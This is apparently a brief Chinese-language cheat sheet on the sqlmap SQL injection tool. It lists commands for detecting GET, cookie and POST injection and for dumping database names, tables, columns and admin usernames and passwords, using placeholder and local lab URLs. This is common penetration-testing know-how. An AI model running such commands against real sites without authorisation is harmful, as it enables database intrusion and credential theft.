SQLmap的注入使用
sqlmap的注入使用常用命令
SQLmap是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap功能更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具,sqlmap可以多平台 运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入 ,更重要的是sqlmap是一款开源的工具
注入命令详解:
找到sqlmap路径,在CMD里面输入CD CC路径进入到SQLMAP路径目录下,然后输入python sqlmap.py -u"xxxxxxxxx"
sqlmap语句含义:
三种注入判断方式:
- python sqlmap.py -u “xxxxxx.com” [查询链接是否存在get注入漏洞以及返现目标基本信息]
- python sqlmap.py -u “xxxxxx.com” --cookie “id=xx” --level 2 [判断url是否存在cookie注入]
- python sqlmap.py -u “xxxxxx.com” --data “xx=xx&xx=xx” [判断url是否存在post注入]
get注入详解
python sqlmap.py -u “xxxxxx.com” --dbs [获取数据库内所有数据库名称]
python sqlmap.py -u “xxxxxx.com” --current-db [查看目标网站所存在的数据库名称]
python sqlmap.py -u “xxxxxx.com” -D XX --tables [获取XX数据库内的表信息]
python sqlmap.py -u “xxxxxx.com” D XX [数据库名] -T XX [表名] --columns [获取表内列的信息]
python sqlmap.py -u “xxxxxx.com” D XX -T XX -C XX,XX[列名] --dump [获取列内信息]
cookie注入详解
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 //判断是否村内在cookie注入
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 --tables//猜解admin表下的列名
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 --dump -C “usename,password” -T admin//获取指定列名admin下的数据
post注入详解
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” //判断注入
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --tables//猜解表明
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --tables -D “security”//猜解security数据库下的表名
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --columns -T “user” //猜解security数据库下的表名user中的列名
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --dump -C “isername,password” -T user //猜解数据